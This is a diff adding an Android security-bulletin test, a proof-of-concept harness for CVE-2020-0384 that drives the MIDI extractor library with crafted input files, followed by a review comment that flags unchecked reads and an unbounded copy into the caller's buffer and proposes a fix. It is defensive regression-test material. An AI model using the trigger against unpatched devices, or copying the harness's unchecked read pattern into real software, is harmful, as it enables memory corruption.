Diffstat (limited to 'hostsidetests/securitybulletin/securityPatch/CVE-2020-0384/poc.cpp')
-rw-r--r-- | hostsidetests/securitybulletin/securityPatch/CVE-2020-0384/poc.cpp | 129 |
1 files changed, 129 insertions, 0 deletions
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0384/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0384/poc.cpp
new file mode 100644
index 00000000000..43da25d3c3e
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0384/poc.cpp
@@ -0,0 +1,129 @@
+/**
+ * Copyright (C) 2020 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include <IMediaExtractor.h>
+#include <dlfcn.h>
+#include <signal.h>
+#include <stdlib.h>
+#include <fcntl.h>
+
+#include "../includes/common.h"
+#include "../includes/memutils.h"
+
+#if _32_BIT
+#define LIBNAME "/system/lib/extractors/libmidiextractor.so"
+#define LIBNAME_APEX \
+ "/apex/com.android.media/lib/extractors/libmidiextractor.so"
+#elif _64_BIT
+#define LIBNAME "/system/lib64/extractors/libmidiextractor.so"
+#define LIBNAME_APEX \
+ "/apex/com.android.media/lib64/extractors/libmidiextractor.so"
+#endif
+
+char enable_selective_overload = ENABLE_NONE;
+
+using namespace android;
+
+class XMFDataSource : public DataSource {
+public:
+ int mFdData;
+ int mFdInfo;
+ XMFDataSource(int fdData, int fdInfo) {
+ mFdData = fdData;
+ mFdInfo = fdInfo;
+ }
+
+ ~XMFDataSource() = default;
+
+ virtual ssize_t readAt(off64_t offset __attribute__((unused)), void *data,
+ size_t size) {
+ uint32_t infoOffset, infoSize;
+ read(mFdInfo, &infoSize, sizeof(int32_t));
+ read(mFdInfo, &infoOffset, sizeof(int32_t));
+ lseek(mFdData, infoOffset, SEEK_SET);
+ read(mFdData, data, infoSize);
+ return size;
+ }
+
+ virtual status_t getSize(off64_t *size) {
+ *size = 0x10000;
+ return 0;
+ }
+ virtual status_t initCheck() const { return 0; }
+};
+
+void close_resources(int fdData, int fdInfo, void *libHandle) {
+ if (fdData >= 0) {
+ ::close(fdData);
+ }
+ if (fdInfo >= 0) {
+ ::close(fdInfo);
+ }
+ if (libHandle) {
+ dlclose(libHandle);
+ }
+}
+
+int main(int argc, char **argv) {
+ if (argc < 3) {
+ return EXIT_FAILURE;
+ }
+ enable_selective_overload = ENABLE_ALL;
+ void *libHandle = dlopen(LIBNAME, RTLD_NOW | RTLD_LOCAL);
+ if (!libHandle) {
+ libHandle = dlopen(LIBNAME_APEX, RTLD_NOW | RTLD_LOCAL);
+ if (!libHandle) {
+ return EXIT_FAILURE;
+ }
+ }
+
+ GetExtractorDef getDef = (GetExtractorDef)dlsym(libHandle, "GETEXTRACTORDEF");
+ if (!getDef) {
+ dlclose(libHandle);
+ return EXIT_FAILURE;
+ }
+
+ int fdData = open(argv[1], O_RDONLY);
+ if (fdData < 0) {
+ dlclose(libHandle);
+ return EXIT_FAILURE;
+ }
+ int fdInfo = open(argv[2], O_RDONLY);
+ if (fdInfo < 0) {
+ close_resources(fdData, fdInfo, libHandle);
+ return EXIT_FAILURE;
+ }
+
+ sp<DataSource> dataSource = (sp<DataSource>)new XMFDataSource(fdData, fdInfo);
+ if (!dataSource) {
+ close_resources(fdData, fdInfo, libHandle);
+ return EXIT_FAILURE;
+ }
+
+ void *meta = nullptr;
+ FreeMetaFunc freeMeta = nullptr;
+
+ float confidence = 0.0f;
+ if (getDef().def_version == EXTRACTORDEF_VERSION_NDK_V1) {
+ getDef().u.v2.sniff(dataSource->wrap(), &confidence, &meta, &freeMeta);
+ } else if (getDef().def_version == EXTRACTORDEF_VERSION_NDK_V2) {
+ getDef().u.v3.sniff(dataSource->wrap(), &confidence, &meta, &freeMeta);
+ }
+
+ close_resources(fdData, fdInfo, libHandle);
+ enable_selective_overload = ENABLE_NONE;
+ return EXIT_SUCCESS;
+} |
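Review bot: In `XMFDataSource::readAt` none of the `read()` or `lseek()` results are checked, so once the info file is exhausted `infoSize` and `infoOffset` are used uninitialised. `infoSize` is also never compared with `size` before `read(mFdData, data, infoSize)` writes into the caller's buffer. Either case makes the harness itself the source of memory corruption, so a crash reported by this test could not be attributed to the extractor library under test. I would initialise both fields, fail the call on a short info read, and reject a record larger than the request, as sketched below. If the test data deliberately relies on `infoSize` exceeding `size`, that should be stated in a comment instead. Separately, `meta` returned by `sniff` in `main` is never released through `freeMeta` before `close_resources` unloads the library.

```cpp
    virtual ssize_t readAt(off64_t offset __attribute__((unused)), void *data,
                           size_t size) {
        uint32_t infoOffset = 0;
        uint32_t infoSize = 0;
        // A short or failed read of the info record means the input is
        // exhausted; report an error instead of using stale values.
        if (read(mFdInfo, &infoSize, sizeof(infoSize)) !=
                    static_cast<ssize_t>(sizeof(infoSize)) ||
            read(mFdInfo, &infoOffset, sizeof(infoOffset)) !=
                    static_cast<ssize_t>(sizeof(infoOffset))) {
            return -1;
        }
        // The harness must never write past the buffer the caller supplied.
        if (infoSize > size) {
            return -1;
        }
        if (lseek(mFdData, infoOffset, SEEK_SET) < 0 ||
            read(mFdData, data, infoSize) < 0) {
            return -1;
        }
        return size;
    }
    // … unchanged: getSize, initCheck …
```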